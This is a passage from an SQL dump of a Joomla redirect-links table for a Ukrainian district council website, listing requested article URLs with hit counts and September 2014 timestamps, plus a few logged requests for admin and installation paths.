00:00:00',301),(2553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-19 13:40:51','0000-00-00 00:00:00',301),(2554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=uk','','','',7,0,'2014-09-19 13:41:11','0000-00-00 00:00:00',301),(2555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=uk','','','',6,0,'2014-09-19 13:41:25','0000-00-00 00:00:00',301),(2556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53&Itemid=94&lang=uk','','','',9,0,'2014-09-19 13:43:33','0000-00-00 00:00:00',301),(2557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',8,0,'2014-09-19 13:43:49','0000-00-00 00:00:00',301),(2558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-----------------14052014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-19 13:44:06','0000-00-00 00:00:00',301),(2559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46&Itemid=85&lang=ru','','','',7,0,'2014-09-19 13:44:09','0000-00-00 00:00:00',301),(2560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=en&Itemid=','','','',8,0,'2014-09-19 13:45:06','0000-00-00 00:00:00',301),(2561,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',13,0,'2014-09-19 13:45:26','0000-00-00 00:00:00',301),(2562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=en','','','',12,0,'2014-09-19 13:49:16','0000-00-00 00:00:00',301),(2563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10&Itemid=17&lang=en','','','',5,0,'2014-09-19 13:49:55','0000-00-00 00:00:00',301),(2564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-19 13:58:16','0000-00-00 00:00:00',301),(2565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&Itemid=14&lang=uk','','','',18,0,'2014-09-19 13:59:09','0000-00-00 00:00:00',301),(2566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-19 14:11:56','0000-00-00 00:00:00',301),(2567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=uk','','','',11,0,'2014-09-19 14:20:54','0000-00-00 00:00:00',301),(2568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-19 14:20:56','0000-00-00 00:00:00',301),(2569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53&Itemid=94&lang=uk','','','',7,0,'2014-09-19 14:58:28','0000-00-00 00:00:00',301),(2570,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46&Itemid=85&lang=uk','','','',2,0,'2014-09-19 15:08:42','0000-00-00 00:00:00',301),(2571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=7&layout=blog&Itemid=12&lang=en','','','',2,0,'2014-09-19 15:16:13','0000-00-00 00:00:00',301),(2572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-19 15:29:03','0000-00-00 00:00:00',301),(2573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=ru','','','',8,0,'2014-09-19 15:29:05','0000-00-00 00:00:00',301),(2574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-19 15:29:45','0000-00-00 00:00:00',301),(2575,'http://www.malyn-rayrada.org.ua/images/stories/dragon.php?rf','','','',2,0,'2014-09-19 15:31:07','0000-00-00 00:00:00',301),(2576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&Itemid=14&lang=ru','','','',19,0,'2014-09-19 15:36:16','0000-00-00 00:00:00',301),(2577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:----20-----&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-19 15:36:18','0000-00-00 00:00:00',301),(2578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54&Itemid=95&lang=ru','','','',3,0,'2014-09-19 15:37:45','0000-00-00 00:00:00',301),(2579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',3,0,'2014-09-19 15:38:07','0000-00-00 00:00:00',301),(2580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1220:2014-02-21-15-56-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-19 15:38:45','0000-00-00 00:00:00',301),(2581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54&Itemid=95&lang=en','','','',7,0,'2014-09-19 15:39:48','0000-00-00 00:00:00',301),(2582,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-19 15:40:07','0000-00-00 00:00:00',301),(2583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',13,0,'2014-09-19 15:40:29','0000-00-00 00:00:00',301),(2584,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',5,0,'2014-09-19 15:40:32','0000-00-00 00:00:00',301),(2585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-19 15:41:10','0000-00-00 00:00:00',301),(2586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=ru','','','',3,0,'2014-09-19 15:42:14','0000-00-00 00:00:00',301),(2587,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-19 15:42:24','0000-00-00 00:00:00',301),(2588,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-19 15:42:51','0000-00-00 00:00:00',301),(2589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1184:----27----6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2014-09-19 15:48:48','0000-00-00 00:00:00',301),(2590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-19 15:49:53','0000-00-00 00:00:00',301),(2591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1051:--------4------&catid=51&Itemid=92&lang=uk','','','',8,0,'2014-09-19 15:50:22','0000-00-00 00:00:00',301),(2592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=uk','','','',9,0,'2014-09-19 15:50:32','0000-00-00 00:00:00',301),(2593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-19 15:51:11','0000-00-00 00:00:00',301),(2594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-19 15:52:55','0000-00-00 00:00:00',301),(2595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:----l---------2011-2014-r-&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-19 15:52:57','0000-00-00 00:00:00',301),(2596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-19 15:54:01','0000-00-00 00:00:00',301),(2597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-19 15:54:28','0000-00-00 00:00:00',301),(2598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-19 15:55:35','0000-00-00 00:00:00',301),(2599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-19 15:55:38','0000-00-00 00:00:00',301),(2600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-19 15:56:10','0000-00-00 00:00:00',301),(2601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-19 15:56:38','0000-00-00 00:00:00',301),(2602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-19 15:56:41','0000-00-00 00:00:00',301),(2603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47&Itemid=86&lang=uk','','','',7,0,'2014-09-19 15:57:08','0000-00-00 00:00:00',301),(2604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-19 15:59:43','0000-00-00 00:00:00',301),(2605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-19 16:01:34','0000-00-00 00:00:00',301),(2606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 16:01:37','0000-00-00 00:00:00',301),(2607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-09-19 16:02:26','0000-00-00 00:00:00',301),(2608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-19 16:03:04','0000-00-00 00:00:00',301),(2609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&Itemid=14&lang=uk','','','',23,0,'2014-09-19 16:04:12','0000-00-00 00:00:00',301),(2610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&Itemid=14&lang=en','','','',32,0,'2014-09-19 16:04:53','0000-00-00 00:00:00',301),(2611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-19 16:05:48','0000-00-00 00:00:00',301),(2612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-19 16:05:50','0000-00-00 00:00:00',301),(2613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=ru','','','',42,0,'2014-09-19 16:06:46','0000-00-00 00:00:00',301),(2614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-19 16:07:35','0000-00-00 00:00:00',301),(2615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-19 16:08:03','0000-00-00 00:00:00',301),(2616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11&lang=ru&Itemid=','','','',6,0,'2014-09-19 16:09:03','0000-00-00 00:00:00',301),(2617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-19 16:09:59','0000-00-00 00:00:00',301),(2618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',5,0,'2014-09-19 16:10:26','0000-00-00 00:00:00',301),(2619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11&lang=uk','','','',6,0,'2014-09-19 16:11:19','0000-00-00 00:00:00',301),(2620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-19 16:14:40','0000-00-00 00:00:00',301),(2621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',10,0,'2014-09-19 16:15:02','0000-00-00 00:00:00',301),(2622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11&lang=uk','','','',6,0,'2014-09-19 16:17:04','0000-00-00 00:00:00',301),(2623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-19 16:23:59','0000-00-00 00:00:00',301),(2624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-19 16:24:56','0000-00-00 00:00:00',301),(2625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-19 16:29:03','0000-00-00 00:00:00',301),(2626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-19 16:30:34','0000-00-00 00:00:00',301),(2627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53&Itemid=94&lang=en','','','',3,0,'2014-09-19 16:31:12','0000-00-00 00:00:00',301),(2628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-19 16:31:36','0000-00-00 00:00:00',301),(2629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-19 16:36:36','0000-00-00 00:00:00',301),(2630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-19 16:38:04','0000-00-00 00:00:00',301),(2631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=uk','','','',10,0,'2014-09-19 16:41:08','0000-00-00 00:00:00',301),(2632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=uk','','','',6,0,'2014-09-19 16:42:05','0000-00-00 00:00:00',301),(2633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&catid=11&lang=uk','','','',17,0,'2014-09-19 16:47:29','0000-00-00 00:00:00',301),(2634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:--------------2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-19 16:49:15','0000-00-00 00:00:00',301),(2635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-19 16:52:06','0000-00-00 00:00:00',301),(2636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-19 16:53:25','0000-00-00 00:00:00',301),(2637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=uk','','','',8,0,'2014-09-19 16:55:17','0000-00-00 00:00:00',301),(2638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-19 16:56:33','0000-00-00 00:00:00',301),(2639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:------------------lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-19 16:57:20','0000-00-00 00:00:00',301),(2640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=en','','','',15,0,'2014-09-19 17:06:07','0000-00-00 00:00:00',301),(2641,'http://malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=en','','','',7,0,'2014-09-19 17:18:56','0000-00-00 00:00:00',301),(2642,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-19 18:04:34','0000-00-00 00:00:00',301),(2643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-19 18:10:43','0000-00-00 00:00:00',301),(2644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=ru','','','',5,0,'2014-09-19 18:20:16','0000-00-00 00:00:00',301),(2645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-19 18:20:41','0000-00-00 00:00:00',301),(2646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 18:26:30','0000-00-00 00:00:00',301),(2647,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&lang=uk','','','',6,0,'2014-09-19 18:50:46','0000-00-00 00:00:00',301),(2648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54:--29112013-&Itemid=95&lang=en','','','',13,0,'2014-09-19 18:56:34','0000-00-00 00:00:00',301),(2649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-19 19:11:30','0000-00-00 00:00:00',301),(2650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47:-21022013-&Itemid=86&lang=uk','','','',5,0,'2014-09-19 19:47:53','0000-00-00 00:00:00',301),(2651,'http://www.malyn-rayrada.org.ua/installation/index.php','','http://yandex.ru/clck/jsredir?from=yandex.ru%3Byandsearch%3Bweb%3B%3B&text=&etext=452.1-4qMVRJM0pwBOvOkSsevdqCUvXg7Fx1sIu_awtX2DZWsKwZfiJSSRyoUsbAbV6j','',85,0,'2014-09-19 20:22:11','0000-00-00 00:00:00',301),(2652,'http://malyn-rayrada.org.ua/wp-login.php','','','',124,0,'2014-09-19 20:57:04','0000-00-00 00:00:00',301),(2653,'http://malyn-rayrada.org.ua/admin/','','','',3,0,'2014-09-19 21:03:05','0000-00-00 00:00:00',301),(2654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=uk','','','',5,0,'2014-09-19 21:20:44','0000-00-00 00:00:00',301),(2655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',15,0,'2014-09-19 21:29:13','0000-00-00 00:00:00',301),(2656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-19 22:35:02','0000-00-00 00:00:00',301),(2657,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-19 22:50:21','0000-00-00 00:00:00',301),(2658,'http://www.malyn-rayrada.org.ua/modules/mod_yoo_accordion/mod_yoo_accordion.css.php','','','',86,0,'2014-09-19 23:04:41','0000-00-00 00:00:00',301),(2659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=ru','','','',6,0,'2014-09-19 23:21:28','0000-00-00 00:00:00',301),(2660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59&Itemid=107&lang=ru','','','',3,0,'2014-09-19 23:21:55','0000-00-00 00:00:00',301),(2661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=7:2010-06-05-12-53-35&layout=blog&Itemid=12&lang=en','','','',6,0,'2014-09-19 23:22:10','0000-00-00 00:00:00',301),(2662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57:--15042014-&Itemid=98&lang=uk','','','',4,0,'2014-09-19 23:24:05','0000-00-00 00:00:00',301),(2663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-19 23:24:17','0000-00-00 00:00:00',301),(2664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-19 23:24:36','0000-00-00 00:00:00',301),(2665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-----l---r------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-19 23:24:41','0000-00-00 00:00:00',301),(2666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59:--20062014-&Itemid=107&lang=uk','','','',5,0,'2014-09-19 23:25:23','0000-00-00 00:00:00',301),(2667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-19 23:25:34','0000-00-00 00:00:00',301),(2668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-19 23:25:43','0000-00-00 00:00:00',301),(2669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=53:--25102013-&Itemid=94&lang=ru','','','',4,0,'2014-09-19 23:25:54','0000-00-00 00:00:00',301),(2670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',15,0,'2014-09-19 23:26:10','0000-00-00 00:00:00',301),(2671,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=ru','','','',2,0,'2014-09-19 23:26:24','0000-00-00 00:00:00',301),(2672,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59&Itemid=107&lang=en','','','',1,0,'2014-09-19 23:26:28','0000-00-00 00:00:00',301),(2673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-19 23:26:44','0000-00-00 00:00:00',301),(2674,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=uk','','','',15,0,'2014-09-19 23:26:54','0000-00-00 00:00:00',301),(2675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=uk','','','',5,0,'2014-09-19 23:27:44','0000-00-00 00:00:00',301),(2676,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=ru','','','',2,0,'2014-09-19 23:27:51','0000-00-00 00:00:00',301),(2677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-19 23:28:06','0000-00-00 00:00:00',301),(2678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 23:28:27','0000-00-00 00:00:00',301),(2679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-19 23:28:39','0000-00-00 00:00:00',301),(2680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-19 23:28:51','0000-00-00 00:00:00',301),(2681,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=en','','','',6,0,'2014-09-19 23:28:59','0000-00-00 00:00:00',301),(2682,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=en','','','',2,0,'2014-09-19 23:29:05','0000-00-00 00:00:00',301),(2683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-19 23:30:16','0000-00-00 00:00:00',301),(2684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=uk','','','',7,0,'2014-09-19 23:30:30','0000-00-00 00:00:00',301),(2685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk','','','',7,0,'2014-09-19 23:31:00','0000-00-00 00:00:00',301),(2686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 23:31:03','0000-00-00 00:00:00',301),(2687,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru&Itemid=','','','',2,0,'2014-09-19 23:31:54','0000-00-00 00:00:00',301),(2688,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-19 23:34:01','0000-00-00 00:00:00',301),(2689,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59&Itemid=107&lang=uk','','','',3,0,'2014-09-19 23:34:57','0000-00-00 